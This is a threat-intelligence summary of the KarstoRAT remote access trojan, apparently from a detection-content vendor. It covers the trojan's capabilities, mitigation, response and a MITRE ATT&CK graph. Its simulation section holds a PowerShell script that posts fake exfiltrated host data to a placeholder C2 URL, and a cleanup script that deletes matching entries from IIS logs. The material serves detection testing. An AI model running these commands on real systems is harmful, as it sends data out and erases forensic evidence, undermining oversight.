SOC Prime Bias: Medium

30 Apr 2026 17:25
newspaper icon levelbluecyber

A Closer Look at the Novel and Stealthy KarstoRAT Malware

Author Photo
SOC Prime Team linkedin icon Follow
A Closer Look at the Novel and Stealthy KarstoRAT Malware
shield icon

Detection stack

  • AIDR
  • Alert
  • ETL
  • Query


Summary

KarstoRAT is a recently identified remote access trojan capable of collecting system information, capturing audio and webcam feeds, taking screenshots, logging keystrokes, and stealing authentication tokens. The malware maintains persistence, communicates with its command-and-control server over HTTP through a distinctive custom user agent, and can retrieve additional payloads for follow-on activity. It also contains disruptive functions, including screen inversion and forced audio playback.

Investigation

LevelBlue SpiderLabs examined KarstoRAT’s execution flow, command-and-control communications, exfiltration routines, and persistence methods. The report highlights an endless two-second loop used to keep the malware running and describes the STARTUP_ON and STARTUP_OFF commands that control automatic launch behavior. Researchers also documented the malware’s ability to change the desktop wallpaper and remove itself when instructed.

Mitigation

Detection efforts should focus on the malware’s unique HTTP user agent, suspicious startup-related registry entries, and abnormal looping process behavior. Endpoint defenses should also watch for the fileless-style activity described in the report and block unknown binaries delivered through the fake Roblox marketplace lure.

Response

If KarstoRAT is identified, isolate the affected device, preserve forensic evidence including HTTP traffic and startup artifacts, and remove all persistence mechanisms. Organizations should rotate exposed credentials and continue monitoring for any secondary payloads that may have been downloaded after the initial compromise.

"graph TB %% Class definitions classDef action fill:#99ccff classDef persistence fill:#ffcc99 classDef credential fill:#ff9999 classDef collection fill:#ccffcc classDef discovery fill:#ccccff classDef impact fill:#ffb347 classDef defense fill:#d3d3d3 %% Node definitions action_user_execution["<b>Action</b> – <b>T1204.001 User Execution: Malicious Link</b><br/>Victim clicks a fake Roblox marketplace link (social engineering)."] class action_user_execution action persistence_boot_script["<b>Persistence</b> – <b>T1037 Boot or Logon Initialization Scripts</b><br/>Malware registers itself in STARTUP_ON/OFF to run automatically on boot or logon."] class persistence_boot_script persistence credential_keylogging["<b>Credential Access</b> – <b>T1056.001 Input Capture: Keylogging</b><br/>Malware records keystrokes to capture credentials and other sensitive data."] class credential_keylogging credential collection_screen_capture["<b>Collection</b> – <b>T1113 Screen Capture</b><br/>Malware periodically captures screenshots of the victim's desktop."] class collection_screen_capture collection collection_audio_capture["<b>Collection</b> – <b>T1123 Audio Capture</b><br/>Malware records audio from the system microphone."] class collection_audio_capture collection collection_video_capture["<b>Collection</b> – <b>T1125 Video Capture</b><br/>Malware accesses the webcam to record video of the victim."] class collection_video_capture collection discovery_process["<b>Discovery</b> – <b>T1057 Process Discovery</b><br/>Malware enumerates running processes to identify security tools or valuable applications."] class discovery_process discovery discovery_hardware["<b>Discovery</b> – <b>T1592.001 Gather Victim Host Information: Hardware</b><br/>Malware collects hardware details such as CPU, RAM, and GPU."] class discovery_hardware discovery discovery_software["<b>Discovery</b> – <b>T1592.002 Gather Victim Host Information: Software</b><br/>Malware gathers installed software versions and patches."] class discovery_software discovery discovery_firmware["<b>Discovery</b> – <b>T1592.003 Gather Victim Host Information: Firmware</b><br/>Malware extracts firmware and BIOS information."] class discovery_firmware discovery discovery_config["<b>Discovery</b> – <b>T1592.004 Gather Victim Host Information: Client Configuration</b><br/>Malware collects configuration settings such as language, time zone, and network parameters."] class discovery_config discovery impact_remote_desktop["<b>Impact</b> – <b>T1219.002 Remote Desktop Software</b><br/>Malware uses remote desktop capabilities to alter the desktop background, flip the display, and swap mouse buttons."] class impact_remote_desktop impact defense_self_destruct["<b>Defense Evasion</b> – <b>T1027.005 Indicator Removal from Tools</b><br/>Malware selfu2011destructs and removes its files to erase evidence."] class defense_self_destruct defense %% Connections action_user_execution –>|leads_to| persistence_boot_script persistence_boot_script –>|enables| credential_keylogging credential_keylogging –>|enables| collection_screen_capture collection_screen_capture –>|enables| collection_audio_capture collection_audio_capture –>|enables| collection_video_capture collection_video_capture –>|enables| discovery_process discovery_process –>|leads_to| discovery_hardware discovery_hardware –>|leads_to| discovery_software discovery_software –>|leads_to| discovery_firmware discovery_firmware –>|leads_to| discovery_config discovery_config –>|enables| impact_remote_desktop impact_remote_desktop –>|triggers| defense_self_destruct "

Attack Flow

Simulation Execution

Prerequisite: The Telemetry & Baseline Pre‑flight Check must have passed.

Rationale: This section details the precise execution of the adversary technique (TTP) designed to trigger the detection rule. The commands and narrative MUST directly reflect the TTPs identified and aim to generate the exact telemetry expected by the detection logic.

  • Attack Narrative & Commands:
    The attacker has obtained a foothold on the victim network and wishes to establish a command‑and‑control channel for KarstoRAT. To blend in with legitimate traffic, the malware uses a hard‑coded User‑Agent string “SecurityNotifier”. The attacker runs a PowerShell one‑liner on the compromised host that issues an HTTP POST to the C2 server, embedding the UA header. The request includes a small JSON payload mimicking exfiltrated data, which is sufficient to trigger the sigma rule.

  • Regression Test Script:

    # KarstoRAT C2 simulation – PowerShell
$c2Url = "http://<webserver>/karsto_c2"
$payload = @{
    host = $env:COMPUTERNAME
    data = "sample exfiltrated data"
} | ConvertTo-Json

$headers = @{
    "User-Agent" = "SecurityNotifier"
    "Content-Type" = "application/json"
}

try {
    Invoke-WebRequest -Uri $c2Url `
                      -Method POST `
                      -Headers $headers `
                      -Body $payload `
                      -UseBasicParsing
    Write-Host "C2 request sent."
} catch {
    Write-Error "Failed to send C2 request: $_"
}

  • Cleanup Commands:

    # Remove generated request from IIS logs (requires admin rights)
$logPath = "C:inetpublogsLogFilesW3SVC1"
Get-ChildItem -Path $logPath -Filter "*.log" | ForEach-Object {
    (Get-Content $_.FullName) |
        Where-Object { $_ -notmatch "SecurityNotifier" } |
        Set-Content $_.FullName
}
Write-Host "Logs sanitized."

Join SOC Prime's Detection as Code platform to improve visibility into threats most relevant to your business. To help you get started and drive immediate value, book a meeting now with SOC Prime experts.

Join for Free